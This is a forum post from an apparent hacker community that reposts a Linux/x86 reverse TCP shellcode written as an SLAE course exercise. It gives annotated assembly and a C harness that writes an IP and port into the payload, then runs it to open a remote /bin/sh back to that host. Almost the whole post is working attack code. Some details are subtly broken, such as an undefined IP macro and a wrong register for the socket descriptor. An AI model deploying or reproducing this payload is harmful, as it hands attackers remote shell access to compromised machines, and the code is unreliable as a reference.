Jump to content
H4CK

Linux/x86反向TCP Shellcode(84个字节)

Recommended Posts

# Title: Linux/x86 - Reverse TCP Shellcode ( 84 bytes )
# Author: Xenofon Vassilakopoulos 
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 84 bytes
# SLAE-ID: SLAE - 1314 
 
--------------------- Reverse Shellcode ---------------------
 
global _start 
section .text 
 
_start:  
 
xor eax, eax   ;zero out eax register  
mul edx        ;zero out edx register 
 
;;sockfd = socket(AF_INET,SOCK_STREAM,0); 
push edx     ; push 0 on the stack which is related with the third argument of the socket system call
mov ebx, edx ; zero out ebx  
inc ebx      ; define the SYS_SOCKET value to be 0x1.  
push ebx     ; SOCK_STREAM constant at type argument  
push 0x2     ; AF_INET constant at domain argument 
mov ecx, esp ; ECX will point to args at the top of the stack 
mov al, 0x66 ; call SocketCall() 
int 0x80     ; call system call interrupt to execute the arguments 
mov edi, eax ; EAX will store the return value of the socket descriptor to edi register 
 
;; sa.sin_family = AF_INET; 
;; sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 
;; sa.sin_port = htons(REMOTE_PORT);
;; connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));
 
pop ebx          ; assign ebx with value (2) 
push 0x04c8a8c0  ; push IP 192.168.200.4 on the stack
push word 0xd204 ; push port 1234 on the stack   
push bx          ; push AF_INET constant into the 16 bytes register avoiding nulls 
mov ecx, esp     ; perform stack alignment - ecx points to struct
push 0x10        ; the size of the port  
push ecx         ; pointer to host_addr struct
push edi         ; save socket descriptor sockfd to struct
mov ecx, esp     ; perform stack alignment - ecx points at struct
inc ebx          ; use the connect system call (3) 
mov al, 0x66     ; call the socketcall system call 
int 0x80         ; call interrupt
 
;;dup2(sockfd, 2); 
;;dup2(sockfd, 1); 
;;dup2(sockfd, 0); 
    
mov ebx, esi  ; move sockfd descriptor to ebx 
xor ecx, ecx  ; zero out the ecx register before using it  
lo:
  mov al, 0x3f  ; the functional number that indicates dup2 (63 in dec)
  int 0x80      ; call dup2 syscall
  inc ecx       ; increase the value of ecx by 1 so it will take all values 0(stdin), 1(stdout), 2(stderr)
  cmp cl, 0x2   ; compare ecx with 2 which indicates the stderr descriptor
  jle lo        ; loop until counter is less or equal to 2
 
 
;; execve("/bin/sh", 0, 0);
xor eax, eax     ; zero out the eax register 
push eax         ; push NULL into the stack  
push 0x68732f2f  ; push "hs//" in reverse order into stack 
push 0x6e69622f  ; push "nib/" in reverse order into stack 
mov ebx, esp     ; point ebx into stack
push eax         ; push NULL into the stack 
mov edx, esp     ; point to edx into stack  
push ebx         ; push ebx into stack 
mov ecx, esp     ; point to ecx into stack 
mov al, 0xb      ; 0xb indicates the execve syscall 
int 0x80         ; execute execve syscall
 
 
--------------------- Shellcode ---------------------
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
 
#define PORT 27
#define REMOTE_ADDRESS 21
 
int main(int argc, char *argv[])
{
 
unsigned char shellcode[] = \
"\x31\xc0\xf7\xe2\x52\x89"
"\xd3\x43\x53\x6a\x02\x89"
"\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x5b\x68"
"\xc0\xa8\xc8\x04"  // IP
"\x66\x68"
"\x04\xd2"   // PORT
"\x66\x53\x89\xe1\x6a\x10"
"\x51\x57\x89\xe1\x43\xb0"
"\x66\xcd\x80\x89\xfb\x31"
"\xc9\xb0\x3f\xcd\x80\x41"
"\x66\x83\xf9\x02\x7e\xf5"
"\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x89\xe2"
"\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
 
// provide binary form of the IP into the shellcode in order to be able to connect to that specific IP address
unsigned ipaddress = inet_addr(argv[1]);
 
// copy the IP in the right shellcode offset 21 bytes from the beginning of the shellcode
memcpy(&shellcode[IP], &ipaddress, 4);
 
// provide binary form of the port into the shellcode in order to be able to connect to that specific port
unsigned int port = htons(atoi(argv[2]));
 
// copy the new port in the right shellcode offset 27 bytes from the beginning of the shellcode
memcpy(&shellcode[PORT], &port, 2);
 
printf("Shellcode Length: %d\n", strlen(shellcode));
 
int (*ret)() = (int(*)())shellcode;
 
ret();
 
}

 

Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines